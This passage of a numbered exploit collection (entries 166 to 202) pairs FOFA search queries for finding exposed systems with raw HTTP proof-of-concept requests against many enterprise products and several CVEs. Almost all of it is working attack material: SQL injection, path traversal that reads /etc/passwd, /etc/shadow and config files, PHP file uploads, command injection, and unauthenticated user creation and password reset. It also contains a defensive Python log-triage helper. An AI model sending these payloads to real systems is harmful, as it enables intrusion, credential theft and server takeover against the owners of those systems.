FOFA:body="技术支持:北京中成科信科技发展有限公司"
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE


167. 精益价值管理系统 (Lean Value Management System) DownLoad.aspx arbitrary file read
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


168. 宏景EHR OutputCode arbitrary file read
FOFA:app="HJSOFT-HCM"
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close


169. 宏景EHR downlawbase SQL injection
FOFA:app="HJSOFT-HCM"
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close


170. 宏景EHR DisplayExcelCustomReport arbitrary file read
FOFA:body="/general/sys/hjaxmanage.js"
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: balalanengliang
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

filename=../webapps/ROOT/WEB-INF/web.xml


171. 通天星 CMSV6 vehicle positioning and monitoring platform SQL injection
FOFA:body="/808gps/"
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close


172. DT HD license plate recognition camera arbitrary file read
FOFA:app="DT-高清车牌识别摄像机"
GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


173. Check Point security gateway arbitrary file read
CVE-2024-24919
FOFA:app="Check_Point-SSL-Network-Extender"
POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

aCSHELL/../../../../../../../etc/shadow


174. 金和OA C6 FileDownLoad.aspx arbitrary file read
FOFA:app="金和网络-金和OA"
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close


175. 金和OA C6 IncentivePlanFulfill.aspx SQL injection
FOFA:app="金和网络-金和OA"
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

176. Telecom gateway configuration management system rewrite.php file upload
FOFA:body="img/login_bg3.png" && body="系统登录"
POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close

------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"


------WebKitFormBoundaryOKldnDPT--


177. H3C router sensitive information disclosure
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg


178. H3C campus network self-service system flexFileUpload arbitrary file upload
FOFA:header="/selfservice"
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 252
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l

-----------------aqutkea7vvanpqy3rh2l
Content-Disposition: form-data; name="12234.txt"; filename="12234"
Content-Type: application/octet-stream
Content-Length: 255

12234
-----------------aqutkea7vvanpqy3rh2l--


GET /imc/primepush/%2e%2e/flex/12234.txt


179. 建文 engineering management system arbitrary file read
POST /Common/DownLoad2.aspx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

path=../log4net.config&Name=


180. 帮管客 CRM jiliyu SQL injection
FOFA:app="帮管客-CRM"
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

181. 润申信息科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20


182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

username=test1234&pwd=test1234&savedays=1

183. 广州图创 library cluster management system updOpuserPw SQL injection
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close


184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
FOFA:server="SunFull-Webs"
POST /soap/AddUser HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: text/xml; charset=utf-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')

185. 瑞友天翼 application virtualization system SQL injection
version < 7.0.5.1
FOFA:app="REALOR-天翼应用虚拟化系统"
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: host


186. F-logic DataCube3 SQL injection
CVE-2024-31750
F-logic DataCube3 is a compact terminal measurement system for photovoltaic power generation systems.
FOFA:title=="DataCube3"
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450


187. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Mura CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1

188. 叁体-佳会 video conferencing attachment arbitrary file read
version <= 3.9.7
FOFA:body="/system/get_rtc_user_defined_info?site_id"
GET /attachment?file=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close


189. 蓝网科技 clinical viewing system deleteStudy SQL injection
FOFA:app="LANWON-临床浏览系统"
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


190. 短视频矩阵营销系统 (short video matrix marketing system) poihuoqu arbitrary file read
FOFA:title=="短视频矩阵营销系统"
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

poi=file:///etc/passwd

191. 亿赛通 Electronic Document Security Management System NavigationAjax SQL injection
FOFA: body="/CDGServer3/index.jsp"
The /js/../ segment normalizes to /CDGServer3/NavigationAjax and is the usual trick for slipping past a path-prefix authentication filter. The id parameter is injected with an MSSQL WAITFOR DELAY; the trailing + after -- is an encoded space so the comment terminates cleanly.

POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=

192. 富通天下 Foreign Trade ERP UploadEmailAttr arbitrary file upload
FOFA: title="用户登录_富通天下外贸ERP"
The name query parameter decides what the stored attachment is called, so name=.ashx makes the server keep the request body under an .ashx name and ASP.NET compiles it as a handler. The body below is a harmless test handler that only writes "test".

POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded

<%@ WebHandler Language="C#" Class="AverageHandler" %>
using System;
using System.Web;

public class AverageHandler : IHttpHandler
{
    public bool IsReusable { get { return true; } }

    public void ProcessRequest(HttpContext ctx)
    {
        ctx.Response.Write("test");
    }
}

193. 山石网科 (Hillstone) 云鉴 Host Security Management System setSystemTimeAction command execution
FOFA: body="山石云鉴主机安全管理系统"
Three steps: fetch a CSRF token, then send a Python expression in param (the handler evaluates it; here os.system writes a marker file under the web root), then read the marker back. The PHPSESSID value is arbitrary but must be the same in the first two requests, because the token is bound to the session.

Step 1: obtain the CSRF token and substitute it for {{token}} below.

GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host: your-ip
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

Step 2: execute the command.

POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
Content-Length: 97

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')

Step 3: verify; the response body should contain 23333333333456.

GET /master/img/config HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0

194. 飞企互联 FE Enterprise Operations Management Platform uploadAttachmentServlet arbitrary file upload
FOFA: app="FE-协作平台"
Quick check: if a request to /servlet/uploadAttachmentServlet gets a response rather than a 404, the vulnerability is present (a reachable servlet alone does not prove the traversal works; confirm with the upload below). The filename is written unsanitized, so the ../ sequences drop the JSP inside the deployed fe.war application.

POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk

------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain

<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"

{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--

195. 飞鱼星 Enterprise Internet Behavior Management System send_order.cgi command execution
FOFA: title=="飞鱼星企业级智能上网行为管理系统"
The name field of the JSON body ends up in a shell command line; the ; separators inject uname -a. Note that the body is JSON even though the Content-Type says form-urlencoded.

POST /send_order.cgi?parameter=operation HTTP/1.1
Host: your-ip
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}

196. 河南省风速科技 Unified Authentication Platform password reset
FOFA: body="/cas/themes/zbvc/js/jquery.min.js"
resetPasswordBySuper is called without any session; xgh identifies the account (student or staff number) and newPass is the password to set.

POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close

{"xgh":"test","newPass":"test666","email":""}

197. 浙大恩特 Customer Resource Management System Quotegask_editAction SQL injection
FOFA: app="浙大恩特客户资源管理系统"
The ;.js suffix on the path is there to get past a suffix-based authentication filter. The injection is in goonumStr; UNION ALL SELECT 111*111 is a probe, and if the injected column is echoed the response contains 12321.

GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close

198. aliyundrive-webdav (阿里云盘 WebDAV) LuCI command injection
CVE-2024-29640
The sid parameter reaches a shell unescaped; the value below URL-decodes to `ls />/www/aaa.txt`. The POC sends a LuCI sysauth session cookie, so expect to need an authenticated session.

GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
Host: your-ip
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

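The three command-injection entries above (193, 195 and 198) show the shapes a defender should be looking for in proxy or WAF logs: an eval-style os.system(...) in a form field, ;-separated commands inside a JSON string, and a percent-encoded backtick substitution that only becomes visible after URL decoding. The Python below is an added triage helper written for this page, not code from any vendor: it decodes query, form and JSON parameters the way the target would, flags shell metacharacters in the decoded values, and tags the three Nday endpoints. The sample requests at the bottom are constructed from the POCs (with a made-up token_csrf value), not captured traffic.

```python
"""Triage helper for the command-injection POCs in entries 193, 195 and 198.

Added example for this collection, not vendor code. Decodes request parameters
the way the target would and flags the shapes those three POCs use.
"""
import json
import re
from typing import Iterator, List, Tuple
from urllib.parse import parse_qsl, urlsplit

# Shell and interpreter constructs that do not belong in a parameter value:
# backtick / $( ) substitution, ; or | followed by a command word, and the
# eval-style os.system( ) that entry 193 feeds to the server-side interpreter.
META = re.compile(r"`|\$\(|[;|]\s*[A-Za-z_]|\bos\.system\(|\bsubprocess\.")

# Endpoints from this list; a hit is worth a look even without metacharacters.
NDAY_PATHS = {
    "/master/ajaxActions/setSystemTimeAction.php": "193 山石网科 云鉴 setSystemTimeAction",
    "/send_order.cgi": "195 飞鱼星 send_order.cgi",
    "/cgi-bin/luci/admin/services/aliyundrive-webdav/query": "198 aliyundrive-webdav CVE-2024-29640",
}

Finding = Tuple[str, str, str]   # (rule, location, evidence)


def candidate_values(target: str, body: str) -> Iterator[Tuple[str, str]]:
    """Yield (location, decoded value) for every query, JSON and form parameter."""
    for key, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        yield f"query:{key}", value        # parse_qsl percent-decodes, so %60 is a backtick here
    if not body:
        return
    stripped = body.lstrip()
    if stripped.startswith("{"):           # entry 195 posts JSON under a form Content-Type
        try:
            data = json.loads(stripped)
        except ValueError:
            data = None
        if isinstance(data, dict):
            for key, value in data.items():
                if isinstance(value, str):
                    yield f"json:{key}", value
            return
    for key, value in parse_qsl(body, keep_blank_values=True):
        yield f"form:{key}", value


def inspect_request(target: str, body: str = "") -> List[Finding]:
    """Return the findings for one request; an empty list means nothing suspicious."""
    findings: List[Finding] = []
    path = urlsplit(target).path
    if path in NDAY_PATHS:
        findings.append(("nday-endpoint", path, NDAY_PATHS[path]))
    for where, value in candidate_values(target, body):
        if META.search(value):
            findings.append(("cmd-metachar", where, value))
    return findings


# Constructed from the POCs on this page (not captured traffic), plus one benign request.
SAMPLE_REQUESTS = [
    ("/master/ajaxActions/setSystemTimeAction.php?token_csrf=deadbeef",
     "param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')"),
    ("/send_order.cgi?parameter=operation",
     '{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}'),
    ("/cgi-bin/luci/admin/services/aliyundrive-webdav/query"
     "?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20", ""),
    ("/index.php?id=5&q=hello+world", ""),
]


def triage(samples=SAMPLE_REQUESTS) -> List[List[Finding]]:
    """Run inspect_request over every sample and return the findings per request."""
    return [inspect_request(target, body) for target, body in samples]


if __name__ == "__main__":
    for (target, _), found in zip(SAMPLE_REQUESTS, triage()):
        print(target.split("?")[0], "->", found or "clean")
```

The metacharacter rule is a triage heuristic, not a blocking signature: legitimate values can contain a semicolon, so treat a cmd-metachar hit on an unknown path as something to read, and a hit on one of the NDAY_PATHS entries as something to act on.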
199. Cockpit (CMS) assetsmanager/upload file upload
FOFA: title="Authenticate Please!"
Three steps: fetch the login CSRF token, log in with it to obtain a session cookie (the POC uses the credentials admin/admin, so a valid account is required), then upload a PHP file through the assets manager and request it.

Step 1: obtain the CSRF token.

GET /auth/login?to=/ HTTP/1.1
Host: your-ip

Response 200; the page contains csfr:"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw" (the value is per instance; use the one you receive).

Step 2: log in with that token to obtain a session cookie.

POST /auth/check HTTP/1.1
Host: your-ip
Content-Type: application/json

{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}

Response 200 with Set-Cookie: mysession=95524f01e238bf51bb60d77ede3bea92; path=/

Step 3: upload with the session cookie. The file is then served from /storage/uploads/tttt.php; the sample payload prints a marker and deletes itself.

POST /assetsmanager/upload HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92

-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
Content-Type: text/php

<?php echo "tttt";unlink(__FILE__);?>
-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="folder"


-----------------------------36D28FBc36bd6feE7Fb3--

200. SeaCMS (海洋影视管理系统) dmku SQL injection
FOFA: app="海洋CMS"
Time-based blind injection in the id parameter of the danmaku (dmku) player endpoint; MySQL sleep(5) inside a derived table.

GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Host: your-ip
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

201. 方正 (Founder) All-Media News Editing System binary SQL injection
FOFA: body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
The TableName parameter is concatenated into the query. URL-decoded it reads: DOM_IMAGE where REFID=-1 union select '1'; WAITFOR DELAY '0:0:5';select DOM_IMAGE from IMG_LARGE_PATH (MSSQL, time-based).

POST /newsedit/newsplan/task/binary.do HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1

202. 微擎 system AccountEdit.aspx arbitrary file upload
FOFA: body="/Widgets/WidgetCollection/"
Two steps: load the form to harvest its __VIEWSTATE and __EVENTVALIDATION values, then post the form back with a file attached. The uploaded file is then served from /_data/Uploads/1123.txt. The bttnUpload value 上传图片 is the button's label and must be sent as-is.

Step 1: fetch __VIEWSTATE and __EVENTVALIDATION.

GET /User/AccountEdit.aspx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
Content-Length: 0

Step 2: substitute both values for the __VIEWSTATE and __EVENTVALIDATION placeholders below and submit.

POST /User/AccountEdit.aspx HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__VIEWSTATE"

__VIEWSTATE
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__EVENTVALIDATION"

__EVENTVALIDATION
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
Content-Type: text/plain

Hello World!
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"

上传图片
-----------------------------786435874t38587593865736587346567358735687
